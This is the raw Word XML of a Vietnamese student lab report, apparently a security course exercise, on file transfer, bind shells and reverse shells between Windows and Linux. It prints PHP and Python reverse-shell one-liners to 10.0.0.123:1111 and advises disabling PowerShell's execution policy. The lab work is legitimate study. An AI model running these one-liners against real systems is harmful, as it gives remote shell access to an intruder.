    <w:p w14:paraId="594B82FD" w14:textId="061E3D5D" w:rsidR="00457A43" w:rsidRPr="00457A43" w:rsidRDefault="00457A43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</w:p>
    <w:p w14:paraId="542C17D8" w14:textId="3ADC8F16" w:rsidR="00BF0D8D" w:rsidRDefault="00BF0D8D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BF0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>23. Thực hiện trao đổi tập tin, bind shell và reverse shell sử dụng PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B9111" w14:textId="53F960B7" w:rsidR="00457A43" w:rsidRDefault="00BF0D8D" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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Thực hiện tương tự như trên, dưới đây là trình bày vắn tắt</w:t>
      </w:r>
      <w:r w:rsidR="00457A43">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. Riêng đối với Powershell, thực hiện thêm lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00457A43">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Set-ExecutionPolicy Unrestricted</w:t>
      </w:r>
      <w:r w:rsidR="00457A43" w:rsidRPr="00457A43">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00457A43">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> để quá trình thuận tiện hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB929AC" w14:textId="2D989868" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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# Trao đổi tập tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120DAB94" w14:textId="5B1AF325" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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- Window mở kết nối tại port 4444 và lưu dữ liệu nhận vào </w:t>
      </w:r>
      <w:r w:rsidRPr="002B0F21">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>File.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65937E94" w14:textId="5352BC51" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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2B0F21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564AD0A1" wp14:editId="0F32A53B">
            <wp:extent cx="3877216" cy="108600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0B78" w14:textId="117923E3" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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- Linux gửi </w:t>
      </w:r>
      <w:r w:rsidR="00123C03">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="00123C03" w:rsidRPr="00123C03">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ls.txt</w:t>
      </w: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 thông qua port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEABAE1" w14:textId="6F6271B6" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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2B0F21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75A0D419" wp14:editId="35F5AA42">
            <wp:extent cx="3572374" cy="752580"/>
            <wp:effectExtent l="0" t="0" r="9525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070" w14:textId="672B9EE0" w:rsidR="00123C03" w:rsidRDefault="00123C03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Kiểm tra file được gửi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA289D" w14:textId="08CF13CA" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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2B0F21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0B36D9F1" wp14:editId="5253B6CF">
            <wp:extent cx="3229426" cy="781159"/>
            <wp:effectExtent l="0" t="0" r="9525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FAC2" w14:textId="3A8A550C" w:rsidR="00BF0D8D" w:rsidRDefault="002B0F21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lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidR="00BF0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Bind Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599E187C" w14:textId="27D24486" w:rsidR="00BF0D8D" w:rsidRDefault="00BF0D8D" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto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Window thực hiện lắng nghe ,gửi terminal của mình khi có connect và phản hồi khi có kết nối.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419F850" w14:textId="489B830C" w:rsidR="00BF0D8D" w:rsidRDefault="00BF0D8D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BF0D8D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4CDB0010" wp14:editId="089E358A">
            <wp:extent cx="4391638" cy="2181529"/>
            <wp:effectExtent l="0" t="0" r="952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D709" w14:textId="4D1E34EF" w:rsidR="00F14DD9" w:rsidRDefault="00BF0D8D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Linux kết nối và thực hiện command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D2099" w14:textId="77777777" w:rsidR="00BF0D8D" w:rsidRDefault="00BF0D8D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BF0D8D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3A6A95D5" wp14:editId="5DDA676A">
            <wp:extent cx="2420070" cy="28575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917" cy="28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24E" w14:textId="280F4718" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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# </w:t>
      </w:r>
      <w:r w:rsidR="00BF0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Reverse Shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73967B8A" w14:textId="68FCA403" w:rsidR="002B0F21" w:rsidRDefault="002B0F21" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both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>- Linux lắng nghe bất kỳ connection tại port 4444 và khi kết nối thành công. Linux sẽ thực hiện lệnh trên terminal của đối phương</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016686E9" w14:textId="20F6B156" w:rsidR="002B0F21" w:rsidRDefault="002B0F21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212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B0F21">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48944901" wp14:editId="7BC174B7">
            <wp:extent cx="5163271" cy="2876951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FE2B" w14:textId="1BB6872F" w:rsidR="002B0F21" w:rsidRDefault="002B0F21" w:rsidP="00EE5242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212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">- Window thực hiện gửi terminal của mình </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5FAB09" w14:textId="77777777" w:rsidR="00F14DD9" w:rsidRDefault="002B0F21" w:rsidP="00F14DD9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B0F21">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4750FDFC" wp14:editId="092C8EEE">
            <wp:extent cx="4305901" cy="476316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5CCB" w14:textId="7B4DB683" w:rsidR="00D7772A" w:rsidRPr="00F14DD9" w:rsidRDefault="00BF0D8D" w:rsidP="00F14DD9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000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF0D8D">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F14DD9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>24. Ngoài netcat và powershell, còn cách nào có thể tạo ra được reverse shell và bind</w:t>
      </w:r>
      <w:r w:rsidRPr="00F14DD9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>shell không? Cho một ví dụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A81AACF" w14:textId="23636339" w:rsidR="00D4581B" w:rsidRDefault="00D4581B" w:rsidP="007E0474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000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nhiều ngôn ngữ có hỗ trợ reverse và bind shell. (Đa số các ngôn ngữ back-end, hỗ trợ coding phía server )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7F566" w14:textId="389EE76D" w:rsidR="00D4581B" w:rsidRDefault="00D4581B" w:rsidP="007E0474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000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ví dụ: (Nguồn: tham khảo Google)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB06B3" w14:textId="5B456D62" w:rsidR="00D4581B" w:rsidRDefault="00D4581B" w:rsidP="007E0474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000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trên PHP:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4581B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>php -r '$sock=fsockopen("10.0.0.123",1111);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E7D22A" w14:textId="4BBD34B3" w:rsidR="00D4581B" w:rsidRPr="00D4581B" w:rsidRDefault="00D4581B" w:rsidP="007E0474">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trên Python: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4581B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>python -c 'import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4581B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.123",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D4581B" w:rsidRPr="00D45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Hoàng Khang Trần" w:date="2021-10-03T21:59:00Z" w:initials="HKT">
    <w:p w14:paraId="1DA414B1" w14:textId="3ABA7A8E" w:rsidR="00F14DD9" w:rsidRDefault="00F14DD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A414B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4A64D" w16cex:dateUtc="2021-10-03T14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A414B1" w16cid:durableId="2504A6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E45D5" w14:textId="77777777" w:rsidR="00304F6F" w:rsidRDefault="00304F6F" w:rsidP="000055C2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02CD07BC" w14:textId="77777777" w:rsidR="00304F6F" w:rsidRDefault="00304F6F" w:rsidP="00005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-Itali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mbria-BoldItalic">
    <w:altName w:val="Cambria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DDFE9" w14:textId="77777777" w:rsidR="00304F6F" w:rsidRDefault="00304F6F" w:rsidP="000055C2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1BE46D45" w14:textId="77777777" w:rsidR="00304F6F" w:rsidRDefault="00304F6F" w:rsidP="00005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07990"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CD070AA"/>
    <w:lvl w:ilvl="0" w:tplc="6102005C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic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F37BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2307276"/>
    <w:lvl w:ilvl="0" w:tplc="E1DAEF02">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Ital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21344"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E46E0B32"/>
    <w:lvl w:ilvl="0" w:tplc="CBD4F74C">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Ital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A442F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E47C0446"/>
    <w:lvl w:ilvl="0" w:tplc="EC448C1E">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Ital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E5A2F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B35C58C8"/>
    <w:lvl w:ilvl="0" w:tplc="AC8268B8">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Ital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2E7AF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1C3EC954"/>
    <w:lvl w:ilvl="0" w:tplc="D8BC414A">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Ital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66565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C4C5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="01989808"/>
    <w:lvl w:ilvl="0" w:tplc="51DE2CAA">
      <w:start w:val="14"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Ital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0B2E2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="746817B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9"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="1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oàng Khang Trần">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="0862bf9ead9026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5C2"/>
    <w:rsid w:val="000055C2"/>
    <w:rsid w:val="00021BDC"/>
    <w:rsid w:val="00080F9B"/>
    <w:rsid w:val="0009087F"/>
    <w:rsid w:val="0011575C"/>
    <w:rsid w:val="0012011E"/>
    <w:rsid w:val="00123C03"/>
    <w:rsid w:val="001E06D2"/>
    <w:rsid w:val="00225D02"/>
    <w:rsid w:val="0025300C"/>
    <w:rsid w:val="00284F43"/>
    <w:rsid w:val="002B0F21"/>
    <w:rsid w:val="002B7858"/>
    <w:rsid w:val="00304F6F"/>
    <w:rsid w:val="0033092C"/>
    <w:rsid w:val="003553C8"/>
    <w:rsid w:val="00457A43"/>
    <w:rsid w:val="00654193"/>
    <w:rsid w:val="0073615B"/>
    <w:rsid w:val="007E0474"/>
    <w:rsid w:val="008162C2"/>
    <w:rsid w:val="009E5109"/>
    <w:rsid w:val="00A11D4C"/>
    <w:rsid w:val="00A3559A"/>
    <w:rsid w:val="00AD3398"/>
    <w:rsid w:val="00B20B8B"/>
    <w:rsid w:val="00B65445"/>
    <w:rsid w:val="00B81FAD"/>
    <w:rsid w:val="00BE762F"/>
    <w:rsid w:val="00BF0D8D"/>
    <w:rsid w:val="00C42B2E"/>
    <w:rsid w:val="00C844C7"/>
    <w:rsid w:val="00D4581B"/>
    <w:rsid w:val="00D7772A"/>
    <w:rsid w:val="00E54152"/>
    <w:rsid w:val="00E74A76"/>
    <w:rsid w:val="00EE5242"/>
    <w:rsid w:val="00F14DD9"/>
    <w:rsid w:val="00F768C7"/>
    <w:rsid w:val="00F9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1B6FF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0F053F0B-14DD-4F8A-93E6-68ABC5D60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D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55C2"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="12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5C2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ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="000055C2"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Times New Roman"/>
      <w:color w:val="212120"/>
      <w:kern w:val="28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055C2"/>
    <w:rPr>
      <w:rFonts w:ascii="UTM Neo Sans Intel" w:eastAsia="Times New Roman" w:hAnsi="UTM Neo Sans Intel" w:cs="Times New Roman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0055C2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0055C2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55C2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055C2"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle01">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000055C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:hint="default"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="212120"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle21">
    <w:name w:val="fontstyle21"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="000055C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria-BoldItalic" w:hAnsi="Cambria-BoldItalic" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="212120"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="fontstyle31">
    <w:name w:val="fontstyle31"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0009087F"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria-BoldItalic" w:hAnsi="Cambria-BoldItalic" w:hint="default"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="21212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AD3398"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00457A43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14D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4D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4D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4D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4DD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1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people" Target="people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13</Pages>
  <Words>1114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Khang Trần</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hoàng Khang Trần</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-01T13:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-03T15:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>